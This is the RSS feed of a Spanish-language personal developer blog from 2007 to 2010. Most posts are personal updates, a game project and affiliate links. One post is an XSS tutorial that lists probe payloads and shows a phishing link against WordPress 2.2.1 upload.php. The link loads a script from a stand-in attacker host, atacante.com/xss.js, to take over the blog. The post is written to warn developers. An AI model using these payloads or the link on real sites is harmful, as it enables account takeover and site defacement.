<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Crysfel&#039;s Blog &#187; Uncategorized</title>
	<atom:link href="http://www.crysfel.com/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.crysfel.com</link>
	<description>Blog geek</description>
	<lastBuildDate>Wed, 10 Mar 2010 23:16:42 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Problemas con quizzpot.com</title>
		<link>http://www.crysfel.com/2010/02/01/problemas-con-quizzpot-com/</link>
		<comments>http://www.crysfel.com/2010/02/01/problemas-con-quizzpot-com/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 16:40:13 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/?p=88</guid>
		<description><![CDATA[Pues desde ayer esta caido el servidor de Quizzpot.com, he tatado de comunicarme con el soporte técnico pero no me responden ni por correo ni en los teléfonos que aparecen en su sitio web.
Tan pronto como se resuleva veré si me cambio de provedor ya que he tenido problemas anteriormente y ya me cansé.


No related [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Pues desde ayer esta caido el servidor de Quizzpot.com, he tatado de comunicarme con el soporte técnico pero no me responden ni por correo ni en los teléfonos que aparecen en su sitio web.</p>
<p>Tan pronto como se resuleva veré si me cambio de provedor ya que he tenido problemas anteriormente y ya me cansé.</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2010/02/01/problemas-con-quizzpot-com/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Moviendonos de casa</title>
		<link>http://www.crysfel.com/2010/01/26/moviendonos-de-casa/</link>
		<comments>http://www.crysfel.com/2010/01/26/moviendonos-de-casa/#comments</comments>
		<pubDate>Wed, 27 Jan 2010 00:37:02 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/?p=3</guid>
		<description><![CDATA[Estoy cambiando de servidor de hosting, por el momento usaré este template, pero lo voy a cambiar en cuanto tenga un poco de tiempo.


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Me falta traerme mis post, pero por falta de tiempo lo haré en otro momento.</p>
<p>Disculpen las molestias</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2010/01/26/moviendonos-de-casa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Feliz año nuevo</title>
		<link>http://www.crysfel.com/2009/12/31/feliz-ano-nuevo/</link>
		<comments>http://www.crysfel.com/2009/12/31/feliz-ano-nuevo/#comments</comments>
		<pubDate>Thu, 31 Dec 2009 17:02:00 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/?p=82</guid>
		<description><![CDATA[Un año mas ha terminado, es increible cuan rápido pasa el tiempo, ayer apenas estaba graduando de la universidad, hoy tengo planes de formar mi propia empresa, de formar una familia, de hacer algunos cambios en mi vida cotidiana, espero que todos tengan un buen año nuevo, no son muchos los lectores de este blog [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Un año mas ha terminado, es increible cuan rápido pasa el tiempo, ayer apenas estaba graduando de la universidad, hoy tengo planes de formar mi propia empresa, de formar una familia, de hacer algunos cambios en mi vida cotidiana, espero que todos tengan un buen año nuevo, no son muchos los lectores de este blog y eso es porque no lo actualizo regularmente.</p>
<p>Cada vez que inicia un año las personas suelen hacer propósitos, suelen definir algunos objetivos, muchas veces estos terminan en los primeros 30 días de enero, algunos otros continuan hasta lograrlos, personalmente me gusta completar mis objetivos, trato hasta donde me sea posible, el día de hoy compartiré mis objetivos para este 2010.</p>
<ul>
<li><strong>Dormirme mas temprano</strong>, el descanso permite que nuestras células se regeneren, ademas nos ayuda a que rindamos mejor el siguiente día, esto es un objetivo complicado para mi, pero haré lo posible por lograrlo.</li>
<li><strong>Participar en una carrera</strong>, es importante hacer ejercicio para mantenernos sanos, como Ingeniero de Software que soy paso la mayor parte del día sentado frente a una computadora y realmente lo disfruto, pero es necesario que agregue un poco de ejercicio a mi intinerario, participar en una <a href="http://araizcorre.wordpress.com/2009/12/23/calendario-de-carreras-2010/">carrera de 5km</a> es un objetivo ambisioso que requerirá entrenamiento y tiempo de práctica, afortunadamente tengo una buena compañera que estará dispuesta a ayudarme (mi perrita &#8220;ruby&#8221;).</li>
<li><strong>Hacer los planes para formar mi familia</strong>, pues esta mas que claro este objetivo, definitivamente quiero casarme y tener una mujer con la cual vivir el resto de mis días, afortunadamente la he encontrado y solo falta dar el paso final.</li>
<li><strong>Formar una empresa</strong>, este ha sido mi sueño desde que estaba en la universidad y este año creo que será el bueno, en el 2009 trabajé para lograr este objetivo y estoy decidido ha consolidarlo en este 2010.</li>
<li><strong>Cambiar el diseño de Quizzpot.com</strong>, Estos ultimos días he estado trabajando en el nuevo diseño de <a href="http://www.quizzpot.com/">Quizzpot.com</a>, ya casi esta listo solo me faltan algunas cosas, pero espero que para la segunda mitad de enero pueda ser remplazado por el actual</li>
<li><strong>Actualizar este blog</strong>, desde hace un buen rato he querido cambiar el diseño de este blog, la verdad es que lo tengo muy descuidado, además quiero actualizarlo mas frecuente y lo haré con temas hacerca de emprendimiento y mi experiencia con Quizzpot</li>
<li><strong>Asistir a un evento geek</strong>, definitivamente soy un Geek por lo tanto quiero asistir a <a href="http://www.campus-party.com.mx/">un evento</a> y si <a href="http://www.sg.com.mx/sg09/">son dos</a>, mucho mejor.</li>
</ul>
<p>Estos son mis objetivos para este 2010, algunos son un poco ambisiosos, trataré de trabajar arduamente para lograrlos, espero que tu también puedas definir tus objetivos ya que es una buena forma de comenzar el año.</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2009/12/31/feliz-ano-nuevo/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Rediseño del sitio</title>
		<link>http://www.crysfel.com/2009/09/29/rediseno-del-sitio/</link>
		<comments>http://www.crysfel.com/2009/09/29/rediseno-del-sitio/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 22:41:31 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/index.php/2009/09/29/rediseno-del-sitio/</guid>
		<description><![CDATA[Ya es hora de darle una maquillada a este sitio, en cuanto tenga tiempo cambiaré el diseño del sitio   desde que inicié con este blog tengo el mismo diseño, ya es tiempo para cambiar.
saludos


No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Ya es hora de darle una maquillada a este sitio, en cuanto tenga tiempo cambiaré el diseño del sitio <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  desde que inicié con este blog tengo el mismo diseño, ya es tiempo para cambiar.</p>
<p>saludos</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2009/09/29/rediseno-del-sitio/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Buena música</title>
		<link>http://www.crysfel.com/2009/09/23/buena-musica/</link>
		<comments>http://www.crysfel.com/2009/09/23/buena-musica/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 15:55:44 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/index.php/2009/09/23/buena-musica/</guid>
		<description><![CDATA[
Vagando por la web me encuentro con este video musical, esta muy bueno, sobre todo para quienes nos gusta tocar la guitarra.
saludos


No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/Ddn4MGaS3N4&#038;hl=es&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Ddn4MGaS3N4&#038;hl=es&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
<p>Vagando por la web me encuentro con este video musical, esta muy bueno, sobre todo para quienes nos gusta tocar la guitarra.</p>
<p>saludos</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2009/09/23/buena-musica/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nuevo proyecto!</title>
		<link>http://www.crysfel.com/2009/04/20/nuevo-proyecto/</link>
		<comments>http://www.crysfel.com/2009/04/20/nuevo-proyecto/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 16:42:08 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/?p=79</guid>
		<description><![CDATA[Pues estoy iniciando un nuevo proyecto que espero sea un éxito   estoy comenzando a realizar un juego online del tipo &#8220;Age of Empires II&#8221; la idea es que el jugador puede crear una civilización con varias ciudades, crear un ejercito grande y poder conquistar a otros jugadores, todo esto será en tiempo real [...]


Related posts:<ol><li><a href='http://www.crysfel.com/2009/12/31/feliz-ano-nuevo/' rel='bookmark' title='Permanent Link: Feliz año nuevo'>Feliz año nuevo</a> <small>Un año mas ha terminado, es increible cuan rápido pasa...</small></li>
</ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Pues estoy iniciando un nuevo proyecto que espero sea un éxito <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  estoy comenzando a realizar un juego online del tipo &#8220;Age of Empires II&#8221; la idea es que el jugador puede crear una civilización con varias ciudades, crear un ejercito grande y poder conquistar a otros jugadores, todo esto será en tiempo real algo así como el juego de &#8220;<a href="http://travian.com">Travian</a>&#8221; en cuanto a tiempo se refiere, el juego además contará con logros, algunos torneos, y muchas mas ideas que tengo en mente.</p>
<p>La verdad es que es divertido trabajar en algo que realmente me agrada, mucho mas divertido que andar haciendo reportes o catálogos jejejejeje&#8230;. actualmente estoy comenzando la parte donde el jugador pordrá crear su ciudad, posicionar sus edificios por toda la pantalla.</p>
<p>Estoy abierto a escuchar ideas, si alguno de los lectores se interesa en darme alguna idea o sugerencia, será mas que bienvenida, en cuanto tenga la primera versión pondré una beta para que puedan probar el juego.</p>
<p>El tiempo de desarrollo no lo he definido aún, puesto que tengo muchas actividades y trabajo que me consume la mayor parte del tiempo (<a href="http://www.quizzpot.com">quizzpot</a> por ejemplo <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_surprised.gif' alt=':o' class='wp-smiley' />  ) pero si voy a trabajar lo mas rápido posible.</p>


<p>Related posts:<ol><li><a href='http://www.crysfel.com/2009/12/31/feliz-ano-nuevo/' rel='bookmark' title='Permanent Link: Feliz año nuevo'>Feliz año nuevo</a> <small>Un año mas ha terminado, es increible cuan rápido pasa...</small></li>
</ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2009/04/20/nuevo-proyecto/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Templates y recursos para nuestros desarrollos</title>
		<link>http://www.crysfel.com/2009/02/23/templates-y-recursos-para-nuestros-desarrollos/</link>
		<comments>http://www.crysfel.com/2009/02/23/templates-y-recursos-para-nuestros-desarrollos/#comments</comments>
		<pubDate>Tue, 24 Feb 2009 00:09:10 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/?p=73</guid>
		<description><![CDATA[Hace dos semanas exactamente que liberé el proyecto de quizzpot.com y la verdad es que ha tenido una muy buena aceptación, algunas personas me han comentado que el diseño del sitio esta muy bien y me han preguntado que si yo lo hice; la verdad es que yo no soy diseñador y honestamente no se [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Hace dos semanas exactamente que liberé el proyecto de <a href="http://www.quizzpot.com">quizzpot.com</a> y la verdad es que ha tenido una muy buena aceptación, algunas personas me han comentado que el diseño del sitio esta muy bien y me han preguntado que si yo lo hice; la verdad es que yo no soy diseñador y honestamente no se me da mucho el diseño gráfico aunque me gusta pero no soy muy hábil, el diseño del sitio lo he comprado en <a href="http://themeforest.net?ref=stock">themeforest.net</a>.</p>
<p>Theme Forest es un lugar donde puedes comprar templates a un precio muy accesible y de muy buena calidad, asi que se los recomiendo ampliamente, si me quieres ayudar a continuar impartiendo el curso que estoy dando en quizzpot lo puedes hacer registrando en <a href="http://themeforest.net?ref=stock">themeforest.net</a>, ellos me darán un pequeña comisión de tu primer deposito <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>En este sitio he comprado algunos templates realmente buenos</p>
<p><a href="http://themeforest.net?ref=stock"><img src="http://www.crysfel.com/wp-content/uploads/2009/02/tf_468x60.jpg" /></a></p>
<p>En este otro sitio he comprado el audio del intro de los video que se imparten en quizzpot.</p>
<p><a href="http://audiojungle.net?ref=stock"><img src="http://www.crysfel.com/wp-content/uploads/2009/02/468x60_aj.jpg" /></a></p>
<p>En este sitio quiero comprar una animación en flash para ponersela al intro de los tutoriales en quizzpot, tienen una gran variedad de animaciones y efectos.</p>
<p><a href="http://flashden.net?ref=stock"><img src="http://www.crysfel.com/wp-content/uploads/2009/02/468x60_fd.jpg" /></a></p>
<p>O bien comprar un video ya hecho, realmente no lo he decidido.</p>
<p><a href="http://videohive.net?ref=stock"><img src="http://www.crysfel.com/wp-content/uploads/2009/02/vh_468x60.jpg" /></a></p>
<p>En este otro sitio puedes comprar PSDs, Texturas y demas recursos para diseñadores.</p>
<p><a href="http://graphicriver.net?ref=stock"><img src="http://www.crysfel.com/wp-content/uploads/2009/02/gr_468x60.jpg" /></a></p>
<p>Pues bien ya lo saben, la próxima vez que inicien algún proyecto web pueden ir a estos sitios a comprar buenos recursos, recuerden utilizar el siguiente link <a href="http://themeforest.net?ref=stock">http://themeforest.net?ref=stock</a>, de esta forma me ayudarán a comprar las animaciones que me hacen falta <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>saludos</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2009/02/23/templates-y-recursos-para-nuestros-desarrollos/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Proyecto terminado</title>
		<link>http://www.crysfel.com/2009/02/10/proyecto-terminado/</link>
		<comments>http://www.crysfel.com/2009/02/10/proyecto-terminado/#comments</comments>
		<pubDate>Tue, 10 Feb 2009 22:03:56 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/?p=72</guid>
		<description><![CDATA[Esta listo el proyecto del que les había hablado anteriormente, pueden visitarlo en:
http://www.quizzpot.com/
Quizzpot es el nombre del proyecto, una escuela online donde se imparten cursos de herramientas para el desarrollo web/software mediante video y además es totalmente gratuito!
Actualmente estoy impartiendo el curso de Ext Js, hay un Quizz (Exámen) para probar tus conocimiento, y he [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Esta listo el proyecto del que les había <a href="http://www.crysfel.com/index.php/2009/01/15/preparando-curso/">hablado anteriormente</a>, pueden visitarlo en:</p>
<p><a href="http://www.quizzpot.com/">http://www.quizzpot.com/</a></p>
<p>Quizzpot es el nombre del proyecto, una escuela online donde se imparten cursos de herramientas para el desarrollo web/software mediante video y además es totalmente gratuito!</p>
<p>Actualmente estoy impartiendo el curso de Ext Js, hay un Quizz (Exámen) para probar tus conocimiento, y he subido los primeros 2 temas del curso, el objetivo es completar el curso en 4 meses apartir de hoy <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Realmente que estoy muy contento con este nuevo lanzamiento y espero que puedan visitar el sitio.</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2009/02/10/proyecto-terminado/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>xss Attacks (Ataques xss)</title>
		<link>http://www.crysfel.com/2007/12/09/xss-attacks-ataques-xss/</link>
		<comments>http://www.crysfel.com/2007/12/09/xss-attacks-ataques-xss/#comments</comments>
		<pubDate>Sun, 09 Dec 2007 19:33:58 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/index.php/2007/12/09/xss-attacks-ataques-xss/</guid>
		<description><![CDATA[Desde hace un par de meses (uno o dos) me he estado introduciendo en el tema de XSS, hoy en día este tipo de ataques es el que más amenaza a los sistemas web, y es que cualquier sitio es vulnerable a sufrir un ataque XSS, desde un sencillo blog hasta los grandes sistemas como [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Desde hace un par de meses (uno o dos) me he estado introduciendo en el tema de XSS, hoy en día este tipo de ataques es el que más amenaza a los sistemas web, y es que cualquier sitio es vulnerable a sufrir un ataque XSS, desde un sencillo blog hasta los grandes sistemas como gmail, ebuy, myspace, el academico de la UM (Tiene varios), etc. En este post voy a aclarar algunas dudas que pudiesen existir, además que mostraré un ejemplo sencillo, todo esto con el afán de que los desarrolladores (programadores) se den cuenta del potencial de estos ataques y al desarrollar sus proyectos tengan en mente esto en todo momento.</p>
<p><strong>¿Qué significa XSS?</strong><br />
En ingles Cross-Site Scripting (CSS), no confundir con Cascade Sheet Style, es por esta razón que se le a puesto una X en lugar de la C.</p>
<p><strong>¿En que consiste un ataque XSS?</strong><br />
Básicamente un ataque XSS es inyectar código en la aplicación vulnerable, se puede alterar el DOM, robar cookies o inclusive ejecutar un archivo maligno.js donde las posibilidades son infinitas, pues pudieses modificar la base de datos mediante AJAX, en fin, un pequeño error puede abrir un universo de posibilidades, para mayor información al respecto te sugiero leer este articulo en la Wikipedia <a href+"http://en.wikipedia.org/wiki/Cross_site_scripting">http://en.wikipedia.org/wiki/Cross_site_scripting</a>.</p>
<p><span id="more-48"></span></p>
<p><strong>¿Qué puedo hacer como usuario para protegerme?</strong><br />
Muchas de las veces personas malintencionadas encuentran una vulnerabilidad en un sitio, y por medio de ingeniería social logran hacer que el usuario de clic sobre un link maligno, al hacer esto la victima ah sido afectada. Para protegerte lo que puedes hacer es utilizar plugins para Firefox que deshabilitan el Javascript en las páginas, permitiéndote ejecutar solo aquellas que tu autorices, puedes descargar el plugin desde aquí <a href="https://addons.mozilla.org/es-ES/firefox/addon/722">https://addons.mozilla.org/es-ES/firefox/addon/722<br />
</a></p>
<p><strong>¿Qué puedo hacer como desarrollador?</strong><br />
Como programador, tu trabajo es validar cada una de las entradas recibidas por formularios o parámetros de la url, tipos de dato, longitudes de cadenas, limpiar caracteres o tags exclusivos de html.</p>
<p><strong>¿Como identifico una vulnerabilidad?</strong><br />
Detectarlo depende de ciertos skills, entre mas experiencia tengas te será más fácil aún, para encontrarlos simplemente prueba enviar a cada parámetro enviado al servidor series de caracteres como estas:</p>
<p>Este es el mas tonto, si un sitio cuenta con esto, es que realmente fue desarrollado por un completo inepto (Sin animo de ofender a nadie).</p>
<p><code lang="html"><br />
"/><script>alert('XSS')</script><br />
</code></p>
<p>Estos dos en caso de que tengan filtradas las comillas</p>
<p><code lang="html"><br />
"/><script>alert(/XSS/.source)</script><br />
"/><script>alert(String.fromCharCode(88,83,83))</script><br />
</code></p>
<p>Este es muy útil algunas veces, para que veas que no solo con etiquetas <strong>&lt;script&gt;</strong> se puede realizar un ataque.</p>
<p><code lang="html"><br />
"><body ONLOAD=alert(/xss/.source)><br />
</code></p>
<p>Una pequeña para cuando te restringen el tamaño de un campo.</p>
<p><code lang="html"><br />
'';!--"<xss>=&#038;{()}<br />
</code></p>
<p>Una muy buena!</p>
<p><code lang="html"><br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></script>">'><script>alert(String.fromCharCode(88,83,83))</script>=&#038;{}<br />
</code></p>
<p>Si te has dado cuenta lo primero que hay que hacer es terminar el tag vulnerable con esto &#8220;/> luego insertar el código malicioso.</p>
<p>Esto es realmente sencillo, solo necesitas tener un poco de imaginación y conocer Javascript, con un poco de pasciencia podrás ir mejorando tus habilidades al encontrar vulnerabilidades.</p>
<p><strong>Ejemplo:</strong><br />
La versión de <strong>wordpress 2.2.1</strong> tiene una grave vulnerabilidad, en la pagina <strong>upload.php</strong> recibe una serie de parámetros, entre ellos uno que se llama <strong>style</strong>, este parámetro no esta filtrado y se imprime directamente en la página.</p>
<p>Con un poco de ingeniería social y un poco de javascript un usuario malintencionado puede tomar el control absoluto del blog, para esto simplemente le mandas al admin un correo fake diciéndole que le han dejado un comentario en el blog y que lo puede ver mediante un link, el usuario da clic sobre el link y listo, el código maligno se ejecuta. El link puede ser semejante a este:</p>
<p><code><br />
http://www.victima.com/wp-admin/upload.php?style="><script SRC=http://atacante.com/xss.js></script>&#038;tab=upload&#038;post_id=-1337<br />
</code></p>
<p>Al ejecutar este link, se incluye un script alojado en el servidor del atacante y se ejecuta sobre las paginas de la victima, un ejemplo de lo que pudiera contener este script puede ser insertar un nuevo usuario administrador, insertar posts, en el peor de los casos borrar todos tus post, editar los archivos php mediante el editor de wordpress, y muchas cosas mas y todo esto que estoy mencionando es realmente sencillo no necesitas ser un gurú para realizarlo, así que si tienes un wordpress mantente actualizado.</p>
<p>Actualmente he enviado varios avisos a personas que tienen esta versión de wordpress, y le he mandado el link anterior, claro esta que el xss.js no lo tengo implementado, por último es importante mencionar que difundas este conocimiento para que se le de un buen uso.</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2007/12/09/xss-attacks-ataques-xss/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Girls are evil</title>
		<link>http://www.crysfel.com/2007/07/05/girls-are-evil/</link>
		<comments>http://www.crysfel.com/2007/07/05/girls-are-evil/#comments</comments>
		<pubDate>Thu, 05 Jul 2007 21:56:50 +0000</pubDate>
		<dc:creator>Crysfel</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.crysfel.com/index.php/2007/07/05/girls-are-evil/</guid>
		<description><![CDATA[Hace rato que me encontre con este chiste, la verdad que me dio mucha risa, espero les guste.  


Traducción:
Prueba de que las mujeres son malas:
Primero establecemos que las mujeres requieren tiempo y dinero
Mujeres = tiempo * dinero
Y como todos sabemos &#8220;El tiempo es dinero&#8221;
Tiempo = Dinero
Entonces:
Mujeres = Dinero * Dinero = (dinero)^2 
y porque [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Hace rato que me encontre con este chiste, la verdad que me dio mucha risa, espero les guste. <img src='http://www.crysfel.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p><img src="http://www.crysfel.com/common/img/girlsAreEvil.jpg" alt="Girls are evil" title="Girls are evil" style="margin:0px auto;" /></p>
<p><span id="more-31"></span></p>
<p>Traducción:</p>
<p>Prueba de que las mujeres son malas:</p>
<p>Primero establecemos que las mujeres requieren tiempo y dinero<br />
<strong>Mujeres = tiempo * dinero</strong></p>
<p>Y como todos sabemos &#8220;El tiempo es dinero&#8221;<br />
<strong>Tiempo = Dinero</strong></p>
<p>Entonces:<br />
<strong>Mujeres = Dinero * Dinero = (dinero)^2 </strong></p>
<p>y porque &#8220;El dinero es la raiz de todos los males&#8221;:<br />
<strong>Dinero = sqrt(males)</strong></p>
<p>Entonces<br />
<strong>Mujeres = (sqrt(Males))^2</strong></p>
<p>Por lo tanto concluimos forzadamente que:<br />
<strong>Mujeres = Males</strong></p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.crysfel.com/2007/07/05/girls-are-evil/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
